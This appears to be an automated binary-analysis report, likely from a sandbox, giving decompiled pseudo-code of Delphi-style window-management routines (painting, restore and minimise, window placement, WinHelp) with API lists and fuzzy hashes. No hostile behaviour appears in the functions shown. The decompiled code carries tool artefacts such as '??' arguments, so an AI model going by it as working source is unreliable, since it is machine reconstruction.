                                                                                								_v24 =  *((intOrPtr*)(__edx + 8));
                                                                                								__eflags =  *_v24 - 1;
                                                                                								if( *_v24 != 1) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t148 = _v8;
                                                                                									__eflags =  *(_t148 + 0x248);
                                                                                									if( *(_t148 + 0x248) == 0) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t250 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                                                                										__eflags = _t250;
                                                                                										if(_t250 == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_v16 = E0041F488(0, 1);
                                                                                											_push(_t259);
                                                                                											_push(0x44f162);
                                                                                											_push( *[fs:eax]);
                                                                                											 *[fs:eax] = _t262;
                                                                                											_v12 = SaveDC( *(_v24 + 0x18));
                                                                                											_push(_t259);
                                                                                											_push(0x44f145);
                                                                                											_push( *[fs:eax]);
                                                                                											 *[fs:eax] = _t262;
                                                                                											E0041FE44(_v16,  *(_v24 + 0x18));
                                                                                											E0041FCC0(_v16);
                                                                                											E00449BE0(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                                                                											_pop(_t239);
                                                                                											 *[fs:eax] = _t239;
                                                                                											_push(0x44f14c);
                                                                                											__eflags = 0;
                                                                                											E0041FE44(_v16, 0);
                                                                                											return RestoreDC( *(_v24 + 0x18), _v12);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								if(_t145 == 1) {
                                                                                									_t257 =  *((intOrPtr*)(__edx + 8));
                                                                                									__eflags =  *_t257 - 1;
                                                                                									if( *_t257 != 1) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t179 = _v8;
                                                                                										__eflags =  *(_t179 + 0x248);
                                                                                										if( *(_t179 + 0x248) == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_t251 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
                                                                                											__eflags = _t251;
                                                                                											if(_t251 == 0) {
                                                                                												goto L43;
                                                                                											} else {
                                                                                												_v20 = GetWindowDC(E0043BD14(_v8));
                                                                                												 *[fs:eax] = _t262;
                                                                                												_v16 = E0041F488(0, 1);
                                                                                												 *[fs:eax] = _t262;
                                                                                												_v12 = SaveDC(_v20);
                                                                                												 *[fs:eax] = _t262;
                                                                                												E0041FE44(_v16, _v20);
                                                                                												E0041FCC0(_v16);
                                                                                												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x44f24c, _t259,  *[fs:eax], 0x44f269, _t259,  *[fs:eax], 0x44f290, _t259);
                                                                                												_pop(_t246);
                                                                                												 *[fs:eax] = _t246;
                                                                                												_push(0x44f253);
                                                                                												__eflags = 0;
                                                                                												E0041FE44(_v16, 0);
                                                                                												return RestoreDC(_v20, _v12);
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									L41:
                                                                                									_t268 =  *_t208 -  *0x487c08; // 0xc075
                                                                                									if(_t268 == 0) {
                                                                                										E00436848(_v8, 0, 0xb025, 0);
                                                                                										E00436848(_v8, 0, 0xb024, 0);
                                                                                										E00436848(_v8, 0, 0xb035, 0);
                                                                                										E00436848(_v8, 0, 0xb009, 0);
                                                                                										E00436848(_v8, 0, 0xb008, 0);
                                                                                										E00436848(_v8, 0, 0xb03d, 0);
                                                                                									}
                                                                                									L43:
                                                                                									_t96 = E004397C4(_v8, _t208);
                                                                                									L44:
                                                                                									return _t96;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}






































                                                                                0x0044f17f
                                                                                0x00000000
                                                                                0x0044f185
                                                                                0x0044f198
                                                                                0x0044f19a
                                                                                0x0044f19c
                                                                                0x00000000
                                                                                0x0044f1a2
                                                                                0x0044f1b0
                                                                                0x0044f1be
                                                                                0x0044f1cd
                                                                                0x0044f1db
                                                                                0x0044f1e7
                                                                                0x0044f1f5
                                                                                0x0044f1fe
                                                                                0x0044f211
                                                                                0x0044f224
                                                                                0x0044f229
                                                                                0x0044f22c
                                                                                0x0044f22f
                                                                                0x0044f234
                                                                                0x0044f239
                                                                                0x0044f24b
                                                                                0x0044f24b
                                                                                0x0044f19c
                                                                                0x0044f17f
                                                                                0x0044ef1f
                                                                                0x0044f297
                                                                                0x0044f299
                                                                                0x0044f29f
                                                                                0x0044f2ad
                                                                                0x0044f2be
                                                                                0x0044f2cf
                                                                                0x0044f2e0
                                                                                0x0044f2f1
                                                                                0x0044f302
                                                                                0x0044f302
                                                                                0x0044f307
                                                                                0x0044f30c
                                                                                0x0044f311
                                                                                0x0044f317
                                                                                0x0044f317
                                                                                0x0044ef19
                                                                                0x0044ef12
                                                                                0x0044ef0d
                                                                                0x0044ef01

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: RestoreSave$FocusWindow
                                                                                • String ID:
                                                                                • API String ID: 1553564791-0
                                                                                • Opcode ID: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction ID: 1e439a01ec3daa42eb792b9dfe2fd44ac08b08da1caa0c646f1805c946d7d8a3
                                                                                • Opcode Fuzzy Hash: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction Fuzzy Hash: BDB16F34A00104EFEB11DF69C586AAEB7F5EB09304F6544BAE804D7761CB38EE45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00455044(void* __eax) {
                                                                                				struct HWND__* _t21;
                                                                                				intOrPtr* _t26;
                                                                                				signed int _t29;
                                                                                				intOrPtr* _t30;
                                                                                				int _t33;
                                                                                				intOrPtr _t36;
                                                                                				void* _t51;
                                                                                				int _t60;
                                                                                
                                                                                				_t51 = __eax;
                                                                                				_t21 = IsIconic( *(__eax + 0x30));
                                                                                				if(_t21 != 0) {
                                                                                					SetActiveWindow( *(_t51 + 0x30));
                                                                                					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                                						L6:
                                                                                						E0045403C( *(_t51 + 0x30), 9, __eflags);
                                                                                					} else {
                                                                                						_t60 = IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t51 + 0x44))));
                                                                                						if(_t60 == 0) {
                                                                                							goto L6;
                                                                                						} else {
                                                                                							_push(0);
                                                                                							_push(0xf120);
                                                                                							_push(0x112);
                                                                                							_push( *(_t51 + 0x30));
                                                                                							L00406CF8();
                                                                                						}
                                                                                					}
                                                                                					_t26 =  *0x486b30; // 0x487a94
                                                                                					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                                					if(_t60 < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					_t30 =  *0x486b30; // 0x487a94
                                                                                					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                                					if(_t60 < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                                					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                                					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                                						E0044FDF4(_t36, 0);
                                                                                						E004521CC( *((intOrPtr*)(_t51 + 0x44)));
                                                                                					}
                                                                                					E004546B8(_t51);
                                                                                					_t21 =  *0x487c00; // 0x22e0f1c
                                                                                					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                                                					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                                                						_t21 = SetFocus(E0043BD14(_t55));
                                                                                					}
                                                                                					if( *((short*)(_t51 + 0x10a)) != 0) {
                                                                                						return  *((intOrPtr*)(_t51 + 0x108))();
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}












                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0045504C
                                                                                • SetActiveWindow.USER32(?,?,?,?,00454A8E,00000000,00454F30), ref: 0045505D
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00455080
                                                                                • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A8E,00000000,00454F30), ref: 00455099
                                                                                • SetWindowPos.USER32(?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 004550DF
                                                                                • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 00455124
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 3996302123-0
                                                                                • Opcode ID: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction ID: 44efac11194c49bad489fcaca8109da60455352909604ac3486cada3038b8842
                                                                                • Opcode Fuzzy Hash: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction Fuzzy Hash: 01313070B006009BEB20AB69CD95B6A3798AF44709F58146AFE00DF3D7D67CEC888759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0043B740(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                                				void* _v20;
                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                				char _v64;
                                                                                				void* _t31;
                                                                                				int _t45;
                                                                                				int _t51;
                                                                                				void* _t52;
                                                                                				int _t56;
                                                                                				int _t58;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                				_t58 = __edx;
                                                                                				_t52 = __eax;
                                                                                				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                                					L4:
                                                                                					if(E0043C018(_t52) == 0) {
                                                                                						L7:
                                                                                						 *(_t52 + 0x40) = _t58;
                                                                                						 *(_t52 + 0x44) = _t56;
                                                                                						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                                						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                                						_t31 = E0043C018(_t52);
                                                                                						__eflags = _t31;
                                                                                						if(_t31 != 0) {
                                                                                							_v48.length = 0x2c;
                                                                                							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                							E00435040(_t52,  &_v64);
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                						}
                                                                                						L9:
                                                                                						E00434CF4(_t52);
                                                                                						return E004037B0(_t52, _t66);
                                                                                					}
                                                                                					_t45 = IsIconic( *(_t52 + 0x180));
                                                                                					_t66 = _t45;
                                                                                					if(_t45 != 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                                					goto L9;
                                                                                				} else {
                                                                                					_t51 = _a4;
                                                                                					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                                						return _t51;
                                                                                					}
                                                                                					goto L4;
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0043B77F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B79D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 0043B7D3
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B7F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction ID: f697fd54e0fb4167afa721afb97f5442208712750027ed9413839f016224fae9
                                                                                • Opcode Fuzzy Hash: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction Fuzzy Hash: 51210375A00204ABCF54EE6DC8C1ADA77A8EF4C354F04546AFE14EF346D779E9048BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00454F94(void* __eax) {
                                                                                				int _t21;
                                                                                				struct HWND__* _t36;
                                                                                				void* _t40;
                                                                                
                                                                                				_t40 = __eax;
                                                                                				_t1 = _t40 + 0x30; // 0x0
                                                                                				_t21 = IsIconic( *_t1);
                                                                                				if(_t21 == 0) {
                                                                                					E004546A8();
                                                                                					_t2 = _t40 + 0x30; // 0x0
                                                                                					SetActiveWindow( *_t2);
                                                                                					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                                						_t15 = _t40 + 0x30; // 0x0
                                                                                						_t21 = E0045403C( *_t15, 6, __eflags);
                                                                                					} else {
                                                                                						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                                                						_t36 = E0043BD14( *((intOrPtr*)(_t40 + 0x44)));
                                                                                						_t13 = _t40 + 0x30; // 0x0
                                                                                						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                                						_push(0);
                                                                                						_push(0xf020);
                                                                                						_push(0x112);
                                                                                						_t14 = _t40 + 0x30; // 0x0
                                                                                						_t21 =  *_t14;
                                                                                						_push(_t21);
                                                                                						L00406CF8();
                                                                                					}
                                                                                					if( *((short*)(_t40 + 0x102)) != 0) {
                                                                                						return  *((intOrPtr*)(_t40 + 0x100))();
                                                                                					}
                                                                                				}
                                                                                				return _t21;
                                                                                			}







                                                                                APIs
                                                                                • IsIconic.USER32 ref: 00454F9C
                                                                                • SetActiveWindow.USER32(00000000,00000000,?,?,0045562C), ref: 00454FB4
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00454FD7
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045562C), ref: 00455000
                                                                                • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455015
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1720852555-0
                                                                                • Opcode ID: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction ID: bc32191d19c11dd8aa89d07b34db473d5acae12cf2d68384427f1f3fe8b85b2d
                                                                                • Opcode Fuzzy Hash: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction Fuzzy Hash: AC113D716006009BDB50EE69C9C6B6A37ACAF08709F08106ABE00DF2C7D67DEC848768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E00426384(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t19;
                                                                                				intOrPtr _t21;
                                                                                				struct HWND__* _t23;
                                                                                
                                                                                				_t19 = _a8;
                                                                                				_t23 = _a4;
                                                                                				if( *0x487abd != 0) {
                                                                                					if((_t19 & 0x00000003) == 0) {
                                                                                						if(IsIconic(_t23) == 0) {
                                                                                							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                                						} else {
                                                                                							GetWindowPlacement(_t23,  &_v48);
                                                                                						}
                                                                                						return E004262F4( &(_v48.rcNormalPosition), _t19);
                                                                                					}
                                                                                					return 0x12340042;
                                                                                				}
                                                                                				_t21 =  *0x487a98; // 0x426384
                                                                                				 *0x487a98 = E00426184(1, _t19, _t21, __edi, _t23);
                                                                                				return  *0x487a98(_t23, _t19);
                                                                                			}











                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: MonitorFromWindow
                                                                                • API String ID: 190572456-2842599566
                                                                                • Opcode ID: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction ID: 567358acfe5b995f89d1c8aef49e0bb1b6a21afc04d96dbc621d34004d80f09b
                                                                                • Opcode Fuzzy Hash: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction Fuzzy Hash: 6B018F71604129AACB01EB94AC81AAF735CEB01318B95042BFC2593242DB3DDA1187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00430110(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				CHAR* _t20;
                                                                                				long _t25;
                                                                                				intOrPtr _t30;
                                                                                				void* _t34;
                                                                                				intOrPtr _t37;
                                                                                
                                                                                				_push(0);
                                                                                				_t34 = __eax;
                                                                                				_push(_t37);
                                                                                				_push(0x43018d);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t37;
                                                                                				E0042FB5C(__eax);
                                                                                				_t25 = GetTickCount();
                                                                                				do {
                                                                                					Sleep(0);
                                                                                				} while (GetTickCount() - _t25 <= 0x3e8);
                                                                                				E0042F7B4(_t34, _t25,  &_v8, 0, __edi, _t34);
                                                                                				if(_v8 != 0) {
                                                                                					_t20 = E004047D0(_v8);
                                                                                					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                                                                				}
                                                                                				_pop(_t30);
                                                                                				 *[fs:eax] = _t30;
                                                                                				_push(0x430194);
                                                                                				return E00404320( &_v8);
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 0042FB5C: WinHelpA.USER32 ref: 0042FB6B
                                                                                • GetTickCount.KERNEL32 ref: 0043012E
                                                                                • Sleep.KERNEL32(00000000,00000000,0043018D,?,?,00000000,00000000,?,00430103), ref: 00430137
                                                                                • GetTickCount.KERNEL32 ref: 0043013C
                                                                                • WinHelpA.USER32 ref: 00430172
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CountHelpTick$Sleep
                                                                                • String ID:
                                                                                • API String ID: 2438605093-0
                                                                                • Opcode ID: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction ID: 893ac3cba8f77228d60b9289927b75d4118f1bf31978c33a349a08650ecbfcdb
                                                                                • Opcode Fuzzy Hash: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction Fuzzy Hash: DF01F270700204AFE711EB76CC52B1EB3A8DB48B04FA1417BF500E3AC1CA3C6E049559
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E004397C4(void* __eax, intOrPtr* __edx) {
                                                                                				char _v20;
                                                                                				char _v28;
                                                                                				intOrPtr _t17;
                                                                                				void* _t19;
                                                                                				void* _t21;
                                                                                				void* _t32;
                                                                                				void* _t39;
                                                                                				void* _t45;
                                                                                				intOrPtr _t47;
                                                                                				intOrPtr _t48;
                                                                                				void* _t50;
                                                                                				void* _t51;
                                                                                				intOrPtr* _t65;
                                                                                				intOrPtr* _t67;
                                                                                				void* _t68;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t50 = __eax;
                                                                                				_t17 =  *__edx;
                                                                                				_t68 = _t17 - 0x84;
                                                                                				if(_t68 > 0) {
                                                                                					_t19 = _t17 + 0xffffff00 - 9;
                                                                                					if(_t19 < 0) {
                                                                                						_t21 = E00435E04(__eax);
                                                                                						if(_t21 != 0) {
                                                                                							L28:
                                                                                							return _t21;
                                                                                						}
                                                                                						L27:
                                                                                						return E00436914(_t50, _t67);
                                                                                					}
                                                                                					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                                						_t21 = E00439730(__eax, _t51, __edx);
                                                                                						if(_t21 == 0) {
                                                                                							goto L27;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                                                                                							goto L28;
                                                                                						}
                                                                                						_t21 = E0043C018(_t50);
                                                                                						if(_t21 == 0) {
                                                                                							goto L28;
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t67 + 8)));
                                                                                						_push( *((intOrPtr*)(_t67 + 4)));
                                                                                						_push( *_t67);
                                                                                						_t32 = E0043BD14(_t50);
                                                                                						_push(_t32);
                                                                                						L00406CF8();
                                                                                						return _t32;
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				if(_t68 == 0) {
                                                                                					_t21 = E00436914(__eax, __edx);
                                                                                					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                                						goto L28;
                                                                                					}
                                                                                					E0040725C( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                                					E004351E4(_t50,  &_v28,  &_v20);
                                                                                					_t21 = E0043969C(_t50, 0,  &_v28, 0);
                                                                                					if(_t21 == 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                                                                                					return _t21;
                                                                                				}
                                                                                				_t39 = _t17 - 7;
                                                                                				if(_t39 == 0) {
                                                                                					_t65 = E0044CA54(__eax);
                                                                                					if(_t65 == 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
                                                                                					if(_t21 == 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				_t21 = _t39 - 1;
                                                                                				if(_t21 == 0) {
                                                                                					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                				} else {
                                                                                					if(_t21 == 0x17) {
                                                                                						_t45 = E0043BD14(__eax);
                                                                                						if(_t45 == GetCapture() &&  *0x46b990 != 0) {
                                                                                							_t47 =  *0x46b990; // 0x0
                                                                                							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                                								_t48 =  *0x46b990; // 0x0
                                                                                								E00436848(_t48, 0, 0x1f, 0);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Capture
                                                                                • String ID:
                                                                                • API String ID: 1145282425-3916222277
                                                                                • Opcode ID: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction ID: 43cdc9794d8c31f967ccfb3724705cbd40727e764bae9717ab87b78639a13af6
                                                                                • Opcode Fuzzy Hash: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction Fuzzy Hash: 523190B130020586CB24AA2D8C8575A6395AF8D318F15B53FB4A6C7792DABCCD05C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E004405C4() {
                                                                                				int _v8;
                                                                                				intOrPtr _t4;
                                                                                				struct HINSTANCE__* _t11;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				struct HINSTANCE__* _t15;
                                                                                				struct HINSTANCE__* _t17;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				struct HINSTANCE__* _t21;
                                                                                				struct HINSTANCE__* _t23;
                                                                                				struct HINSTANCE__* _t25;
                                                                                				struct HINSTANCE__* _t27;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				intOrPtr _t40;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t44;
                                                                                
                                                                                				_t42 = _t44;
                                                                                				_t4 =  *0x486dd0; // 0x4877f0
                                                                                				if( *((char*)(_t4 + 0xc)) == 0) {
                                                                                					return _t4;
                                                                                				} else {
                                                                                					_v8 = SetErrorMode(0x8000);
                                                                                					_push(_t42);
                                                                                					_push(0x44072a);
                                                                                					_push( *[fs:eax]);
